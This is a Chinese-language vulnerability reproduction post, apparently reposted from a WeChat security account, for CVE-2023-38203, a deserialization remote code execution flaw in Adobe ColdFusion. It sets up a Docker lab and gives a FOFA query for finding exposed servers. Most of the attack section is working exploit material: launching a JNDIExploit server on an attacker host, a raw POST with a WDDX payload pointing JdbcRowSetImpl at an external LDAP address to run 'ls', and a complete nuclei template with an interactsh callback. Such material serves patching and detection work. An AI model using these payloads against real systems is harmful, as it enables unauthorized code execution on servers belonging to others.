[漏洞复现] CVE-2023-38203(附POC)

admin 2024年3月5日07:50:38评论55 views字数 3298阅读10分59秒阅读模式

使

01

漏洞名称

Adobe ColdFusion 反序列化漏洞

02

漏洞影响

Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)

03

漏洞描述

AdobeQ ColdFusion是一种服务器端的Web,应用开发平台。它由Adobe Systems开发,用于创建动态的、交互式的Web应用程序和网站。Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)受到反序列化未受信任数据漏洞的影响,可能导致任意代码执行。利用此问题不需要用户交互。

04

靶场搭建

方便期间使用docker搭建靶场

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动容器

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

查看容器

docker ps

[漏洞复现] CVE-2023-38203(附POC)

访问页面:http://192.168.40.130:32773/

[漏洞复现] CVE-2023-38203(附POC)

靶场搭建完毕

04

FOFA搜索语句

app="Adobe-ColdFusion"

[漏洞复现] CVE-2023-38203(附POC)

05

漏洞复现

先在windows上启动一下JNDIExploit-1.4-SNAPSHOT.jar,工具包在文末获取,命令中的192.168.40.1是我本机IP

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.40.1

[漏洞复现] CVE-2023-38203(附POC)

然后向靶场发送如下数据包,执行ls命令,其中ldap://192.168.40.1:1389/Basic/TomcatEcho中的ip端口是我们启动监听的IP和端口/Basic/TomcatEcho表示TomcatEcho回显链

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1Host: 192.168.40.130:32773Content-Type: application/x-www-form-urlencodedContent-Length: 289cmd: ls

argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap://192.168.40.1:1389/Basic/TomcatEcho</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

[漏洞复现] CVE-2023-38203(附POC)

[漏洞复现] CVE-2023-38203(附POC)

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2023-38203

info:  name: Adobe ColdFusion Deserialization of Untrusted Data  author: yiran  severity: critical  description: |    Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.  impact: |    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.  remediation: |    Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.  reference:    - https://blog.projectdiscovery.io/adobe-coldfusion-rce/    - https://nvd.nist.gov/vuln/detail/CVE-2023-38203    - https://github.com/Ostorlab/KEV  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H    cvss-score: 9.8    cve-id: CVE-2023-38203    cwe-id: CWE-502    epss-score: 0.517    epss-percentile: 0.97465    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*  metadata:    max-request: 1    vendor: adobe    product: coldfusion    shodan-query: http.component:"Adobe ColdFusion"    fofa-query: app="Adobe-ColdFusion"  tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev

variables:  callback: "{{interactsh-url}}"  jndi: "ldap%3a//{{callback}}/zdfzfd"

http:  - raw:      - |        POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")          - contains(body, "ColdFusion documentation")        condition: and# digest: 4b0a00483046022100f6280931eee930b47cdc03d8c30ba67d06c87b834c6e0bb84178023c691233d40221008ad4dde32f3b56f4537ce1fe8adf2bc0e5914ac40ce1837539b8faf698227a7d:922c64590222798bb761d5b6d8e72950

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):[漏洞复现] CVE-2023-38203(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月5日07:50:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] CVE-2023-38203(附POC)http://cn-sec.com/archives/2547125.html

发表评论

匿名网友 填写信息